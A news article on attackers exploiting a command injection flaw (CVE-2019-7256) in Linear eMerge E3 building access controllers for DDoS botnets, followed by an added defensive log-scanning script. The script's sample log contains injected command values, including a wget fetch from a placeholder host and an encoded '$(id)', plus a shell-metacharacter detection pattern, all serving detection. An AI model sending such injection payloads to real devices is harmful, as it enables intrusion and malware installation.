Hackers break into access control systems in buildings and use them for DDoS attacks

Tomcat
SonicWall experts warned of a wave of attacks on smart access control systems in buildings, which cybercriminals then use to organize DDoS attacks.

The researchers explain that the attacks target Linear eMerge E3 devices manufactured by Nortek Security & Control. These are so-called "access control hardware" devices installed in offices, factories, and similar sites. Their main purpose is to control which doors and rooms employees and visitors can enter, based on their credentials (access codes) and smart cards.

Back in May last year, experts from Applied Risk disclosed details of ten vulnerabilities affecting Linear eMerge E3 devices. Although six of the ten issues scored 9.8 out of a maximum 10 on the CVSS v3 scale, the developers have not released a fix for these bugs. As a result, after the disclosure waiting period had passed, Applied Risk experts published PoC exploits in the public domain in November 2019.

SonicWall researchers now warn that hackers are scanning for vulnerable Linear eMerge E3 devices and exploiting one of the ten previously disclosed vulnerabilities against them: CVE-2019-7256. This issue is described as a command injection bug and was one of two vulnerabilities scored 10 out of 10 on the CVSS v3 scale. This means that the bug can be exploited remotely, even by low-skilled attackers without deep technical knowledge.

SonicWall explains that an unauthenticated remote attacker could exploit the problem to execute arbitrary commands in the context of the application through a specially crafted HTTP request. Currently, hackers use the bug to take control of devices, download and install malware, and then launch DDoS attacks. According to SonicWall, about 2,375 vulnerable devices are exposed on the Internet, based on Shodan statistics.

The first attacks were spotted by Bad Packets on January 9, 2020, and have continued since then.

The researchers also warn that in addition to DDoS attacks, vulnerable devices can be used as entry points into the internal networks of organizations. System administrators are strongly advised to disconnect vulnerable devices from the Internet or restrict access to them using a firewall and VPN.
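The two defensive points above, restricting who can reach the controller and watching for command-injection attempts in its HTTP traffic, can be checked from the device's web access log. The script below is an added example, not code from the original post, from SonicWall, or from Nortek; it assumes a Common Log Format access log, a hypothetical VPN client range 10.8.0.0/24 as the only allowed source, and constructed placeholder request paths that do not reproduce the actual CVE-2019-7256 request. It flags requests from outside the allowlist and requests whose URL-decoded query string carries shell metacharacters.

```python
import re
import ipaddress
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic). The request paths and
# parameter names are placeholders, not the actual CVE-2019-7256 request.
SAMPLE_LOG = """\
10.8.0.12 - - [09/Jan/2020:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.7 - - [09/Jan/2020:10:01:05 +0000] "GET /placeholder.php?id=1;wget%20http://198.51.100.9/x HTTP/1.1" 200 91
10.8.0.15 - - [09/Jan/2020:10:02:11 +0000] "POST /login HTTP/1.1" 302 0
203.0.113.7 - - [09/Jan/2020:10:02:40 +0000] "GET /placeholder.php?id=%24%28id%29 HTTP/1.1" 200 44
198.51.100.22 - - [09/Jan/2020:10:03:00 +0000] "GET /status?name=abc HTTP/1.1" 200 17
"""

# Common Log Format: client ip, ident, user, [timestamp], "METHOD path PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell separators and subshell openers typically seen in OS command injection payloads.
INJECTION_RE = re.compile(r'(;|\|\||\||&&|`|\$\(|\$\{)')

# Hypothetical allowlist: only VPN clients may reach the access controller.
ALLOWED_NETS = [ipaddress.ip_network("10.8.0.0/24")]


def parse_line(line):
    """Return the fields of one log line, with the request path URL-decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded_path"] = unquote_plus(rec["path"])
    return rec


def is_allowed_source(ip):
    """True if the client address falls inside an allowed (VPN) network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ALLOWED_NETS)


def has_injection_markers(decoded_path):
    """True if the query string contains shell metacharacters after decoding."""
    _, _, query = decoded_path.partition("?")
    return bool(query) and INJECTION_RE.search(query) is not None


def scan_log(text):
    """Return one finding per suspicious request, with the reasons it was flagged."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = []
        if not is_allowed_source(rec["ip"]):
            reasons.append("source outside VPN allowlist")
        if has_injection_markers(rec["decoded_path"]):
            reasons.append("shell metacharacters in query string")
        if reasons:
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "path": rec["decoded_path"],
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["path"], "->", "; ".join(f["reasons"]))
```

Decoding before matching matters: the fourth sample line carries `$(id)` only in percent-encoded form, so a filter that inspects the raw request line would miss it. The allowlist check is the log-side view of the firewall-and-VPN restriction the researchers recommend; any hit from outside it means the device is still reachable from the Internet.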